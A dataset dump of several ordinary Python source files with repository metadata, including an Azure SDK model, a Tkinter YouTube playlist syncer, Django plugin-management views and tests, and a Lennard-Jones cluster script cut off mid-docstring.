f719145474888494e028913c2c5ae60602cf70ac | 1,826 | py | Python | azure-mgmt-network/azure/mgmt/network/v2018_01_01/models/application_gateway_ssl_predefined_policy.py | JonathanGailliez/azure-sdk-for-python | f0f051bfd27f8ea512aea6fc0c3212ee9ee0029b | [
"MIT"
] | 1 | 2022-03-30T22:39:15.000Z | 2022-03-30T22:39:15.000Z | azure-mgmt-network/azure/mgmt/network/v2018_01_01/models/application_gateway_ssl_predefined_policy.py | JonathanGailliez/azure-sdk-for-python | f0f051bfd27f8ea512aea6fc0c3212ee9ee0029b | [
"MIT"
] | 54 | 2016-03-25T17:25:01.000Z | 2018-10-22T17:27:54.000Z | azure-mgmt-network/azure/mgmt/network/v2018_01_01/models/application_gateway_ssl_predefined_policy.py | JonathanGailliez/azure-sdk-for-python | f0f051bfd27f8ea512aea6fc0c3212ee9ee0029b | [
"MIT"
] | 2 | 2017-01-20T18:25:46.000Z | 2017-05-12T21:31:47.000Z | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from .sub_resource import SubResource
class ApplicationGatewaySslPredefinedPolicy(SubResource):
    """An Ssl predefined policy.
    :param id: Resource ID.
    :type id: str
    :param name: Name of Ssl predefined policy.
    :type name: str
    :param cipher_suites: Ssl cipher suites to be enabled in the specified
    order for application gateway.
    :type cipher_suites: list[str or
    ~azure.mgmt.network.v2018_01_01.models.ApplicationGatewaySslCipherSuite]
    :param min_protocol_version: Minimum version of Ssl protocol to be
    supported on application gateway. Possible values include: 'TLSv1_0',
    'TLSv1_1', 'TLSv1_2'
    :type min_protocol_version: str or
    ~azure.mgmt.network.v2018_01_01.models.ApplicationGatewaySslProtocol
    """
    # Serialization map: model attribute -> wire key/type (consumed by the
    # msrest serializer; do not edit by hand -- AutoRest-generated).
    _attribute_map = {
        'id': {'key': 'id', 'type': 'str'},
        'name': {'key': 'name', 'type': 'str'},
        'cipher_suites': {'key': 'properties.cipherSuites', 'type': '[str]'},
        'min_protocol_version': {'key': 'properties.minProtocolVersion', 'type': 'str'},
    }
    def __init__(self, **kwargs):
        # All properties arrive as keyword args; 'id' is handled by the
        # SubResource base initializer.
        super(ApplicationGatewaySslPredefinedPolicy, self).__init__(**kwargs)
        self.name = kwargs.get('name', None)
        self.cipher_suites = kwargs.get('cipher_suites', None)
        self.min_protocol_version = kwargs.get('min_protocol_version', None)
| 40.577778 | 88 | 0.64184 |
from .sub_resource import SubResource
class ApplicationGatewaySslPredefinedPolicy(SubResource):
    """An SSL predefined policy for an application gateway.

    Accepts keyword args ``name``, ``cipher_suites`` and
    ``min_protocol_version``; ``id`` is consumed by the SubResource base
    class.  AutoRest-generated model -- do not edit by hand.
    """
    # Serialization map: model attribute -> wire key/type (used by msrest).
    _attribute_map = {
        'id': {'key': 'id', 'type': 'str'},
        'name': {'key': 'name', 'type': 'str'},
        'cipher_suites': {'key': 'properties.cipherSuites', 'type': '[str]'},
        'min_protocol_version': {'key': 'properties.minProtocolVersion', 'type': 'str'},
    }
    def __init__(self, **kwargs):
        """Populate the model from keyword arguments."""
        super(ApplicationGatewaySslPredefinedPolicy, self).__init__(**kwargs)
        self.name = kwargs.get('name', None)
        self.cipher_suites = kwargs.get('cipher_suites', None)
        self.min_protocol_version = kwargs.get('min_protocol_version', None)
| true | true |
f71914c4aecc58a1fc572531f55a0757d52c5800 | 3,271 | py | Python | youtube_synchronizer/interfaces/youtube-playlist-synchronizer.py | entangledcognition/youtube-playlist-syncronizer | ff4bc8b0e49a2b51194405731dc3c4b5cf7b3ce8 | [
"MIT"
] | 1 | 2020-01-26T01:31:08.000Z | 2020-01-26T01:31:08.000Z | youtube_synchronizer/interfaces/youtube-playlist-synchronizer.py | entangledcognition/youtube-playlist-syncronizer | ff4bc8b0e49a2b51194405731dc3c4b5cf7b3ce8 | [
"MIT"
] | 1 | 2020-01-26T01:38:48.000Z | 2020-01-26T01:38:48.000Z | youtube_synchronizer/interfaces/youtube-playlist-synchronizer.py | bharathmuppa/youtube-playlist-syncronizer | ff4bc8b0e49a2b51194405731dc3c4b5cf7b3ce8 | [
"MIT"
] | null | null | null | from PIL import Image, ImageTk
from tkinter import Tk, Text, BOTH, W, N, E, S,filedialog,messagebox
from tkinter.ttk import Frame, Button, Label, Style, Progressbar
from youtube_synchronizer.utils import createFolderForPlaylist
from youtube_synchronizer.dataconnectors.youtube_login import loginToGoogle
class YoutubeFrame(Frame):
    """Main application frame.

    Walks the user through three steps: choose a root directory, grant
    Google permission, then sync YouTube playlists into sub-folders of
    the chosen root.
    """

    def __init__(self):
        super().__init__()
        self.initUI()

    def initUI(self):
        """Build the static widget layout and print the usage steps."""
        self.master.title("Youtube Synchronizer")
        self.pack(fill=BOTH, expand=True)
        self.rowconfigure(3, weight=1)
        self.rowconfigure(5, pad=1)
        lbl = Label(self, text="Welcome to Youtube playlist Synchronizer")
        lbl.grid(sticky=W, pady=4, padx=5)
        # Read-only log pane; appendLog() is the only writer.
        self.logArea = Text(self, state="disabled")
        self.logArea.grid(row=1, column=0, columnspan=3, rowspan=4,
                          padx=5, sticky=E + W + S + N)
        self.appendLog("Steps to follow \n")
        self.appendLog("1) Select root directory \n ")
        self.appendLog("2) Give permission for google to get playlist automatically \n")
        self.appendLog("3) start syncing into your selected folder\n")
        # Each button passes itself to its handler so the handler can
        # replace it with a status label once the step is done.
        cbtn = Button(self, text="Choose Directory", command=lambda: self.chooseRootDirectory(cbtn))
        cbtn.grid(row=5, column=0, pady=2)
        hbtn = Button(self, text="Google Permission", command=lambda: self.clicked(hbtn))
        hbtn.grid(row=5, column=1, padx=2)
        obtn = Button(self, text="Start Sync", command=self.startSyncing)
        obtn.grid(row=5, column=3)

    def clicked(self, event):
        """Run the Google OAuth flow, then swap the button for a label."""
        loginToGoogle()  # side effect: launches the permission flow
        event.grid_forget()
        label = Label(self, text="Google Permissions Granted")
        label.grid(row=5, column=1, pady=2)
        self.appendLog("Thanks for granting Google Permission")

    def chooseRootDirectory(self, event):
        """Prompt for the sync root directory and swap the button for a label."""
        self.rootDirectory = filedialog.askdirectory()
        event.grid_forget()
        label = Label(self, text=self.rootDirectory)
        label.grid(row=5, column=0, pady=2)
        self.appendLog("You have selected " + self.rootDirectory + " as your root directory")

    def appendLog(self, text):
        """Append a line to the read-only log pane."""
        self.logArea.configure(state='normal')
        self.logArea.insert('end', text + '\n')
        self.logArea.configure(state='disabled')

    def startSyncing(self):
        """Confirm with the user, then create playlist folders under the root.

        Bug fix: the success message used to be logged only when the user
        answered "no" (and nothing happened on "yes"); the branches are now
        the right way round.
        """
        self.response = messagebox.askquestion(
            "Confirmation", "you have selected: " + self.rootDirectory +
            " as root Directory and youtube playlist will be added as sub folders inside " + self.rootDirectory + "/, are you sure?")
        if self.response == 'yes':
            createFolderForPlaylist(self.rootDirectory)
            self.appendLog("Playlist synchronized successfully")
        else:
            self.appendLog("Synchronization cancelled")
self.appendLog("Playlist synchronized successfully")
def main():
    """Create the Tk root window, attach the synchronizer frame and run."""
    root = Tk()
    app = YoutubeFrame()  # attaches itself to the default root window
    root.mainloop()
root.mainloop()
if __name__ == '__main__':
main()
| 37.170455 | 168 | 0.634668 | from PIL import Image, ImageTk
from tkinter import Tk, Text, BOTH, W, N, E, S,filedialog,messagebox
from tkinter.ttk import Frame, Button, Label, Style, Progressbar
from youtube_synchronizer.utils import createFolderForPlaylist
from youtube_synchronizer.dataconnectors.youtube_login import loginToGoogle
class YoutubeFrame(Frame):
def __init__(self):
super().__init__()
self.initUI()
def initUI(self):
self.master.title("Youtube Synchronizer")
self.pack(fill=BOTH, expand=True)
self.rowconfigure(3, weight=1)
self.rowconfigure(5, pad=1)
lbl = Label(self, text="Welcome to Youtube playlist Synchronizer")
lbl.grid(sticky=W, pady=4, padx=5)
bar = Progressbar(self, length=200, style='black.Horizontal.TProgressbar')
self.logArea = Text(self,state="disabled")
self.logArea.grid(row=1, column=0, columnspan=3, rowspan=4,
padx=5, sticky=E+W+S+N)
self.appendLog("Steps to follow \n")
self.appendLog("1) Select root directory \n ")
self.appendLog("2) Give permission for google to get playlist automatically \n")
self.appendLog("3) start syncing into your selected folder\n")
cbtn = Button(self, text="Choose Directory", command=lambda: self.chooseRootDirectory(cbtn))
cbtn.grid(row=5, column=0, pady=2)
hbtn = Button(self, text="Google Permission", command=lambda: self.clicked(hbtn))
hbtn.grid(row=5, column=1, padx=2)
obtn = Button(self, text="Start Sync", command=self.startSyncing)
obtn.grid(row=5, column=3)
def clicked(self,event):
googlePermissionUrl = loginToGoogle()
event.grid_forget()
label = Label(self, text="Google Permissions Granted")
label.grid(row=5, column=1, pady=2)
self.appendLog("Thanks for granting Google Permission")
def chooseRootDirectory(self,event):
self.rootDirectory = filedialog.askdirectory()
event.grid_forget()
label = Label(self, text=self.rootDirectory)
label.grid(row=5, column=0, pady=2)
self.appendLog("You have selected "+ self.rootDirectory +" as your root directory")
def appendLog(self,text):
self.logArea.configure(state='normal')
self.logArea.insert('end', text+'\n')
self.logArea.configure(state='disabled')
def startSyncing(self):
self.response = messagebox.askquestion("Confirmation", "you have selected: " + self.rootDirectory +
" as root Directory and youtube playlist will be added as sub folders inside " + self.rootDirectory + "/, are you sure?")
if self.response == 'yes':
createFolderForPlaylist(self.rootDirectory)
else:
self.appendLog("Playlist synchronized successfully")
def main():
root = Tk()
app = YoutubeFrame()
root.mainloop()
if __name__ == '__main__':
main()
| true | true |
f71914f55a893db82056922f6a48c469c030a16d | 559 | py | Python | libs/sync_bn/src/__init__.py | hx-Tang/GANet | 8935c9d3d82189fa6f940c2a877534a398a041e4 | [
"MIT"
] | 497 | 2019-04-16T02:43:06.000Z | 2022-03-13T10:26:12.000Z | libs/sync_bn/src/__init__.py | hx-Tang/GANet | 8935c9d3d82189fa6f940c2a877534a398a041e4 | [
"MIT"
] | 103 | 2019-04-18T07:28:58.000Z | 2021-12-22T08:45:16.000Z | libs/sync_bn/src/__init__.py | hx-Tang/GANet | 8935c9d3d82189fa6f940c2a877534a398a041e4 | [
"MIT"
] | 146 | 2019-04-22T13:39:41.000Z | 2022-03-26T03:32:42.000Z | import os
import torch
from torch.utils.cpp_extension import load
# Paths to the C++/CUDA sources that live next to this __init__.py.
cwd = os.path.dirname(os.path.realpath(__file__))
cpu_path = os.path.join(cwd, 'cpu')
gpu_path = os.path.join(cwd, 'gpu')
# JIT-compile the CPU synchronized-BatchNorm extension at import time;
# build artifacts are cached in build_directory.
cpu = load('sync_bn_cpu', [
    os.path.join(cpu_path, 'operator.cpp'),
    os.path.join(cpu_path, 'sync_bn.cpp'),
], build_directory=cpu_path, verbose=False)
# Only build the CUDA extension when a CUDA runtime is actually present.
if torch.cuda.is_available():
    gpu = load('sync_bn_gpu', [
        os.path.join(gpu_path, 'operator.cpp'),
        os.path.join(gpu_path, 'sync_bn_cuda.cu'),
    ], build_directory=gpu_path, verbose=False)
| 29.421053 | 50 | 0.695886 | import os
import torch
from torch.utils.cpp_extension import load
cwd = os.path.dirname(os.path.realpath(__file__))
cpu_path = os.path.join(cwd, 'cpu')
gpu_path = os.path.join(cwd, 'gpu')
cpu = load('sync_bn_cpu', [
os.path.join(cpu_path, 'operator.cpp'),
os.path.join(cpu_path, 'sync_bn.cpp'),
], build_directory=cpu_path, verbose=False)
if torch.cuda.is_available():
gpu = load('sync_bn_gpu', [
os.path.join(gpu_path, 'operator.cpp'),
os.path.join(gpu_path, 'sync_bn_cuda.cu'),
], build_directory=gpu_path, verbose=False)
| true | true |
f719157c0ed0ea389406cf401792444090c08f94 | 725 | py | Python | tests/utils/test_utils_django.py | bitcaster-io/bitcaster | 9f1bad96e00e3bc78a22451731e231d30662b166 | [
"BSD-3-Clause"
] | 4 | 2018-03-01T10:22:30.000Z | 2020-04-04T16:31:11.000Z | tests/utils/test_utils_django.py | bitcaster-io/bitcaster | 9f1bad96e00e3bc78a22451731e231d30662b166 | [
"BSD-3-Clause"
] | 60 | 2018-05-20T04:42:32.000Z | 2022-02-10T17:03:37.000Z | tests/utils/test_utils_django.py | bitcaster-io/bitcaster | 9f1bad96e00e3bc78a22451731e231d30662b166 | [
"BSD-3-Clause"
] | 1 | 2018-08-04T05:06:45.000Z | 2018-08-04T05:06:45.000Z | from unittest import mock
from unittest.mock import Mock
from bitcaster.utils.django import (activator_factory,
deactivator_factory, toggler_factory,)
def test_toggler_factory():
    """toggler_factory('test') yields a callable that returns truthy."""
    # Stub out the mail connection so the factory runs without side effects.
    patched = mock.patch('bitcaster.utils.django.get_connection')
    with patched:
        toggle = toggler_factory('test')
        result = toggle(Mock(), Mock(), Mock())
    assert result
def test_activator_factory():
    """activator_factory('test') yields a callable that returns truthy."""
    patched = mock.patch('bitcaster.utils.django.get_connection')
    with patched:
        activate = activator_factory('test')
        result = activate(Mock(), Mock(), Mock())
    assert result
def test_deactivator_factory():
    """deactivator_factory('test') yields a callable that returns truthy."""
    patched = mock.patch('bitcaster.utils.django.get_connection')
    with patched:
        deactivate = deactivator_factory('test')
        result = deactivate(Mock(), Mock(), Mock())
    assert result
| 30.208333 | 74 | 0.670345 | from unittest import mock
from unittest.mock import Mock
from bitcaster.utils.django import (activator_factory,
deactivator_factory, toggler_factory,)
def test_toggler_factory():
with mock.patch('bitcaster.utils.django.get_connection'):
func = toggler_factory('test')
assert func(Mock(), Mock(), Mock())
def test_activator_factory():
with mock.patch('bitcaster.utils.django.get_connection'):
func = activator_factory('test')
assert func(Mock(), Mock(), Mock())
def test_deactivator_factory():
with mock.patch('bitcaster.utils.django.get_connection'):
func = deactivator_factory('test')
assert func(Mock(), Mock(), Mock())
| true | true |
f719162b3d3e8d2a126762c598211bece33424a9 | 334 | py | Python | experiments/jacobi-1d/tmp_files/4223.py | LoopTilingBenchmark/benchmark | 52a3d2e70216552a498fd91de02a2fa9cb62122c | [
"BSD-2-Clause"
] | null | null | null | experiments/jacobi-1d/tmp_files/4223.py | LoopTilingBenchmark/benchmark | 52a3d2e70216552a498fd91de02a2fa9cb62122c | [
"BSD-2-Clause"
] | null | null | null | experiments/jacobi-1d/tmp_files/4223.py | LoopTilingBenchmark/benchmark | 52a3d2e70216552a498fd91de02a2fa9cb62122c | [
"BSD-2-Clause"
] | null | null | null | from chill import *
# CHiLL transformation recipe for the PolyBench jacobi-1d stencil kernel.
source('/uufs/chpc.utah.edu/common/home/u1142914/lib/ytopt_vinu/polybench/polybench-code/stencils/jacobi-1d/kernel.c')
destination('/uufs/chpc.utah.edu/common/home/u1142914/lib/ytopt_vinu/experiments/jacobi-1d/tmp_files/4223.c')
# Operate on the first loop nest of kernel_jacobi_1d.
procedure('kernel_jacobi_1d')
loop(0)
# Declare the iteration-space bound so the transformation is legal.
known(' n > 2 ')
# Tile with size 8; exact argument semantics follow CHiLL's tile()
# (statement, level, size, outer level) -- TODO confirm against CHiLL docs.
tile(0,2,8,2)
tile(1,2,8,2)
| 30.363636 | 118 | 0.763473 | from chill import *
source('/uufs/chpc.utah.edu/common/home/u1142914/lib/ytopt_vinu/polybench/polybench-code/stencils/jacobi-1d/kernel.c')
destination('/uufs/chpc.utah.edu/common/home/u1142914/lib/ytopt_vinu/experiments/jacobi-1d/tmp_files/4223.c')
procedure('kernel_jacobi_1d')
loop(0)
known(' n > 2 ')
tile(0,2,8,2)
tile(1,2,8,2)
| true | true |
f71916c16a3387a714ba74da62f20782e4f9fe3d | 7,539 | py | Python | core/views.py | ICFL-UP/Yrden | 88c421f1b391e9a6943455b05b8f397e9023187b | [
"MIT"
] | null | null | null | core/views.py | ICFL-UP/Yrden | 88c421f1b391e9a6943455b05b8f397e9023187b | [
"MIT"
] | 6 | 2022-02-16T06:08:43.000Z | 2022-02-16T06:08:55.000Z | core/views.py | ICFL-UP/Yrden | 88c421f1b391e9a6943455b05b8f397e9023187b | [
"MIT"
] | null | null | null | import logging
import os
import json
import shutil
import threading
from typing import Any, List
from django.contrib.auth import login
from django.forms.models import BaseModelForm
from django.http.request import HttpRequest
from django.http.response import HttpResponse
from django.views.generic import ListView, DetailView, CreateView
from django.core.paginator import Paginator, PageNotAnInteger, EmptyPage
from django.urls import reverse_lazy
from django.views.generic.edit import DeleteView
from django.shortcuts import redirect, render
from django.urls import reverse
from django.utils import timezone
from datetime import datetime
from django.contrib.auth.mixins import LoginRequiredMixin
from core.utils import build_zip_json, create_venv, extract_zip, get_python_choices, write_log
from core.models import Plugin, PluginRun
from core.forms import NewUserForm, PluginFormSet, PluginSourceForm
from core.enums.log_type_enum import LogType
logging.basicConfig(level=logging.DEBUG,
format='[%(levelname)s] (%(threadName)-9s) %(message)s',)
def register_request(request: HttpRequest):
    """Handle user sign-up.

    POST: validate the submitted form; on success create the user, log
    them in and redirect to the plugin index.  On validation failure the
    *bound* form is re-rendered so its error messages are shown.
    GET: render an empty registration form.
    """
    if request.method == "POST":
        form = NewUserForm(request.POST)
        if form.is_valid():
            user = form.save()
            login(request, user)
            return redirect(reverse("core:index"))
        # Bug fix: previously a fresh empty form replaced the bound one
        # here, silently discarding all validation errors.
    else:
        form = NewUserForm()
    return render(request=request, template_name="registration/register.html", context={"register_form": form})
class PluginIndexView(LoginRequiredMixin, ListView):
    """Paginated list of all installed plugins (5 per page); login required."""
    model = Plugin
    template_name = 'core/index.html'
    context_object_name = 'plugins'
    paginate_by = 5
    def get_context_data(self, **kwargs):
        """Paginate the queryset by hand and expose it as 'plugins'.

        A non-integer ?page= falls back to page 1; an out-of-range page
        falls back to the last page.
        """
        context = super(PluginIndexView, self).get_context_data(**kwargs)
        plugins = self.get_queryset()
        page = self.request.GET.get('page')
        paginator = Paginator(plugins, self.paginate_by)
        try:
            plugins = paginator.page(page)
        except PageNotAnInteger:
            plugins = paginator.page(1)
        except EmptyPage:
            plugins = paginator.page(paginator.num_pages)
        context['plugins'] = plugins
        return context
class PluginDetailView(LoginRequiredMixin, DetailView):
    """Detail page for one plugin with its runs paginated (5 per page)."""
    model = Plugin
    template_name = 'core/plugin_detail.html'
    context_object_name = 'plugin'
    paginate_by = 5
    def get_context_data(self, **kwargs):
        """Add this plugin's runs to the context, paginated by hand.

        A non-integer ?page= falls back to page 1; an out-of-range page
        falls back to the last page.
        """
        context = super(PluginDetailView, self).get_context_data(**kwargs)
        plugin_runs = PluginRun.objects.filter(plugin=self.kwargs['pk'])
        page = self.request.GET.get('page')
        paginator = Paginator(plugin_runs, self.paginate_by)
        try:
            plugin_runs = paginator.page(page)
        except PageNotAnInteger:
            plugin_runs = paginator.page(1)
        except EmptyPage:
            plugin_runs = paginator.page(paginator.num_pages)
        context['plugin_runs'] = plugin_runs
        return context
class PluginCreateView(LoginRequiredMixin, CreateView):
    """Upload a plugin zip: stores the PluginSource, extracts the archive,
    creates a virtualenv for it and writes an audit log entry."""
    form_class = PluginSourceForm
    template_name = 'core/plugin_create_form.html'
    success_url = reverse_lazy('core:index')
    def get_context_data(self, **kwargs):
        """Expose an empty PluginFormSet alongside the source form."""
        context = super(PluginCreateView, self).get_context_data(**kwargs)
        context['plugin_formset'] = PluginFormSet()
        return context
    def post(self, request, *args, **kwargs):
        """Validate both the source form and the plugin formset together."""
        self.object = None
        form_class = self.get_form_class()
        form = self.get_form(form_class)
        plugin_formset = PluginFormSet(self.request.POST)
        if form.is_valid() and plugin_formset.is_valid():
            return self.form_valid(form, plugin_formset, request.user)
        else:
            return self.form_invalid(form, plugin_formset)
    def form_valid(self, form: BaseModelForm, plugin_formset: PluginFormSet, user):
        """Persist the PluginSource and Plugin, then kick off background work.

        Three threads are spawned: zip-content hashing, zip extraction
        (joined before the venv is built) and virtualenv creation.
        """
        # save PluginSource
        self.object = form.save(commit=False)
        self.object.source_dest = form.cleaned_data['source_dest']
        self.object.source_hash = form.cleaned_data['source_hash']
        self.object.upload_time = form.cleaned_data['upload_time']
        self.object.upload_user = user
        self.object.save()
        # Hash every file inside the uploaded zip in the background.
        build_hash_thread = threading.Thread(
            target=build_zip_json, args=(form.cleaned_data['plugin_zip_file'].file, self.object))
        build_hash_thread.start()
        # Audit-log the upload event.
        log_json: dict = {
            'log_datetime': datetime.timestamp(timezone.now()),
            'source_dest': self.object.source_dest,
            'source_hash': self.object.source_hash,
            'upload_time': self.object.upload_time.strftime("%m/%d/%Y, %H:%M:%S"),
            'upload_user_username': self.object.upload_user.username,
            'upload_user_email': self.object.upload_user.email,
        }
        write_log(LogType.CREATE, self.object, log_json)
        # save Plugin
        plugin: List[Plugin] = plugin_formset.save(commit=False)
        plugin[0].plugin_source = self.object
        plugin[0].python_version = plugin_formset.cleaned_data[0]['python_version']
        # Destination folder is keyed by source hash + upload timestamp.
        plugin[0].plugin_dest = 'core' + os.sep + \
            'plugin' + os.sep + self.object.source_hash + '_' + \
            str(datetime.timestamp(self.object.upload_time))
        extract_zip_thread = threading.Thread(target=extract_zip, args=(
            form.cleaned_data['plugin_zip_file'], plugin[0].plugin_dest))
        extract_zip_thread.start()
        plugin[0].save()
        # Extraction must finish before the virtualenv is created in place.
        extract_zip_thread.join()
        venv_thread = threading.Thread(target=create_venv, args=(plugin[0], ))
        venv_thread.start()
        return redirect(reverse("core:index"))
    def form_invalid(self, form, plugin_formset):
        """Re-render with both the bound form and the bound formset."""
        return self.render_to_response(
            self.get_context_data(form=form,
                                  product_meta_formset=plugin_formset
                                  )
        )
class PluginDeleteView(LoginRequiredMixin, DeleteView):
    """Delete a plugin: removes its extracted tree, archives its source
    under a 'deleted_' prefix and writes an audit log entry."""
    model = Plugin
    template_name = 'core/plugin_delete.html'
    success_url = reverse_lazy('core:index')
    def delete(self, request: HttpRequest, *args: str, **kwargs: Any) -> HttpResponse:
        """Tear down the plugin's files before delegating the DB delete."""
        object: Plugin = self.get_object()
        user = request.user
        source_dest = object.plugin_source.source_dest
        # Remove the extracted plugin tree; the source archive is kept.
        shutil.rmtree(object.plugin_dest)
        deleted_time = timezone.now()
        # Archive location: same naming scheme, prefixed with 'deleted_'.
        deleted_dest = 'core' + os.sep + 'source' + os.sep + 'deleted_' + object.plugin_source.source_hash + \
            '_' + str(datetime.timestamp(object.plugin_source.upload_time))
        log_json: dict = {
            'log_datetime': datetime.timestamp(deleted_time),
            'source_dest': object.plugin_source.source_dest,
            'source_hash': object.plugin_source.source_hash,
            'upload_time': object.plugin_source.upload_time.strftime("%m/%d/%Y, %H:%M:%S"),
            'upload_user_username': object.plugin_source.upload_user.username,
            'upload_user_email': object.plugin_source.upload_user.email,
            'source_file_hash': json.loads(object.plugin_source.source_file_hash),
            'username': user.username,
            'user_email': user.email,
            'deleted_dest': deleted_dest
        }
        write_log(LogType.DELETE, object.plugin_source, log_json)
        # Move the source archive and mark the DB record as deleted.
        shutil.move(source_dest, deleted_dest)
        object.plugin_source.source_hash = 'deleted_' + object.plugin_source.source_hash
        object.plugin_source.source_dest = deleted_dest
        object.plugin_source.save()
        return super().delete(request, *args, **kwargs)
| 38.464286 | 110 | 0.67635 | import logging
import os
import json
import shutil
import threading
from typing import Any, List
from django.contrib.auth import login
from django.forms.models import BaseModelForm
from django.http.request import HttpRequest
from django.http.response import HttpResponse
from django.views.generic import ListView, DetailView, CreateView
from django.core.paginator import Paginator, PageNotAnInteger, EmptyPage
from django.urls import reverse_lazy
from django.views.generic.edit import DeleteView
from django.shortcuts import redirect, render
from django.urls import reverse
from django.utils import timezone
from datetime import datetime
from django.contrib.auth.mixins import LoginRequiredMixin
from core.utils import build_zip_json, create_venv, extract_zip, get_python_choices, write_log
from core.models import Plugin, PluginRun
from core.forms import NewUserForm, PluginFormSet, PluginSourceForm
from core.enums.log_type_enum import LogType
logging.basicConfig(level=logging.DEBUG,
format='[%(levelname)s] (%(threadName)-9s) %(message)s',)
def register_request(request: HttpRequest):
if request.method == "POST":
form = NewUserForm(request.POST)
if form.is_valid():
user = form.save()
login(request, user)
return redirect(reverse("core:index"))
form = NewUserForm()
return render(request=request, template_name="registration/register.html", context={"register_form":form})
class PluginIndexView(LoginRequiredMixin, ListView):
model = Plugin
template_name = 'core/index.html'
context_object_name = 'plugins'
paginate_by = 5
def get_context_data(self, **kwargs):
context = super(PluginIndexView, self).get_context_data(**kwargs)
plugins = self.get_queryset()
page = self.request.GET.get('page')
paginator = Paginator(plugins, self.paginate_by)
try:
plugins = paginator.page(page)
except PageNotAnInteger:
plugins = paginator.page(1)
except EmptyPage:
plugins = paginator.page(paginator.num_pages)
context['plugins'] = plugins
return context
class PluginDetailView(LoginRequiredMixin, DetailView):
model = Plugin
template_name = 'core/plugin_detail.html'
context_object_name = 'plugin'
paginate_by = 5
def get_context_data(self, **kwargs):
context = super(PluginDetailView, self).get_context_data(**kwargs)
plugin_runs = PluginRun.objects.filter(plugin=self.kwargs['pk'])
page = self.request.GET.get('page')
paginator = Paginator(plugin_runs, self.paginate_by)
try:
plugin_runs = paginator.page(page)
except PageNotAnInteger:
plugin_runs = paginator.page(1)
except EmptyPage:
plugin_runs = paginator.page(paginator.num_pages)
context['plugin_runs'] = plugin_runs
return context
class PluginCreateView(LoginRequiredMixin, CreateView):
form_class = PluginSourceForm
template_name = 'core/plugin_create_form.html'
success_url = reverse_lazy('core:index')
def get_context_data(self, **kwargs):
context = super(PluginCreateView, self).get_context_data(**kwargs)
context['plugin_formset'] = PluginFormSet()
return context
def post(self, request, *args, **kwargs):
self.object = None
form_class = self.get_form_class()
form = self.get_form(form_class)
plugin_formset = PluginFormSet(self.request.POST)
if form.is_valid() and plugin_formset.is_valid():
return self.form_valid(form, plugin_formset, request.user)
else:
return self.form_invalid(form, plugin_formset)
def form_valid(self, form: BaseModelForm, plugin_formset: PluginFormSet, user):
self.object = form.save(commit=False)
self.object.source_dest = form.cleaned_data['source_dest']
self.object.source_hash = form.cleaned_data['source_hash']
self.object.upload_time = form.cleaned_data['upload_time']
self.object.upload_user = user
self.object.save()
build_hash_thread = threading.Thread(
target=build_zip_json, args=(form.cleaned_data['plugin_zip_file'].file, self.object))
build_hash_thread.start()
log_json: dict = {
'log_datetime': datetime.timestamp(timezone.now()),
'source_dest': self.object.source_dest,
'source_hash': self.object.source_hash,
'upload_time': self.object.upload_time.strftime("%m/%d/%Y, %H:%M:%S"),
'upload_user_username': self.object.upload_user.username,
'upload_user_email': self.object.upload_user.email,
}
write_log(LogType.CREATE, self.object, log_json)
plugin: List[Plugin] = plugin_formset.save(commit=False)
plugin[0].plugin_source = self.object
plugin[0].python_version = plugin_formset.cleaned_data[0]['python_version']
plugin[0].plugin_dest = 'core' + os.sep + \
'plugin' + os.sep + self.object.source_hash + '_' + \
str(datetime.timestamp(self.object.upload_time))
extract_zip_thread = threading.Thread(target=extract_zip, args=(
form.cleaned_data['plugin_zip_file'], plugin[0].plugin_dest))
extract_zip_thread.start()
plugin[0].save()
extract_zip_thread.join()
venv_thread = threading.Thread(target=create_venv, args=(plugin[0], ))
venv_thread.start()
return redirect(reverse("core:index"))
def form_invalid(self, form, plugin_formset):
return self.render_to_response(
self.get_context_data(form=form,
product_meta_formset=plugin_formset
)
)
class PluginDeleteView(LoginRequiredMixin, DeleteView):
model = Plugin
template_name = 'core/plugin_delete.html'
success_url = reverse_lazy('core:index')
def delete(self, request: HttpRequest, *args: str, **kwargs: Any) -> HttpResponse:
object: Plugin = self.get_object()
user = request.user
source_dest = object.plugin_source.source_dest
shutil.rmtree(object.plugin_dest)
deleted_time = timezone.now()
deleted_dest = 'core' + os.sep + 'source' + os.sep + 'deleted_' + object.plugin_source.source_hash + \
'_' + str(datetime.timestamp(object.plugin_source.upload_time))
log_json: dict = {
'log_datetime': datetime.timestamp(deleted_time),
'source_dest': object.plugin_source.source_dest,
'source_hash': object.plugin_source.source_hash,
'upload_time': object.plugin_source.upload_time.strftime("%m/%d/%Y, %H:%M:%S"),
'upload_user_username': object.plugin_source.upload_user.username,
'upload_user_email': object.plugin_source.upload_user.email,
'source_file_hash': json.loads(object.plugin_source.source_file_hash),
'username': user.username,
'user_email': user.email,
'deleted_dest': deleted_dest
}
write_log(LogType.DELETE, object.plugin_source, log_json)
shutil.move(source_dest, deleted_dest)
object.plugin_source.source_hash = 'deleted_' + object.plugin_source.source_hash
object.plugin_source.source_dest = deleted_dest
object.plugin_source.save()
return super().delete(request, *args, **kwargs)
| true | true |
f71916d9d2b9a6b8eedcdd508d02ad5f7bc188ca | 9,543 | py | Python | examples/LJ_38_Oh.py | scottfredericks/PyXtal_Old | 3fa39b2f188197b42576087c6f4c3bca14b2e8f3 | [
"MIT"
] | 1 | 2019-10-25T01:10:47.000Z | 2019-10-25T01:10:47.000Z | examples/LJ_38_Oh.py | scottfredericks/PyXtal_Old | 3fa39b2f188197b42576087c6f4c3bca14b2e8f3 | [
"MIT"
] | null | null | null | examples/LJ_38_Oh.py | scottfredericks/PyXtal_Old | 3fa39b2f188197b42576087c6f4c3bca14b2e8f3 | [
"MIT"
] | null | null | null | from pyxtal.crystal import random_cluster
from copy import deepcopy
from optparse import OptionParser
from random import randint, choice
from scipy.optimize import minimize
from scipy.spatial.distance import pdist, cdist
from pyxtal.molecule import PointGroupAnalyzer
from pymatgen import Molecule
from pyxtal.database.collection import Collection
from time import time
import numpy as np
import matplotlib.pyplot as plt
import warnings
plt.style.use("bmh")
warnings.filterwarnings("ignore")
"""
This is a script to
1, generate random clusters
2, perform optimization
"""
def LJ(pos, dim, mu=0.1):
    """
    Calculate the total Lennard-Jones energy of a cluster.

    Args:
        pos: 1D array with N*dim numbers representing the atomic positions
        dim: dimension of the hyper/normal space
        mu: strength of the harmonic penalty on the extra (dim > 3)
            coordinates

    Returns:
        E: the total energy including the punishing function
    """
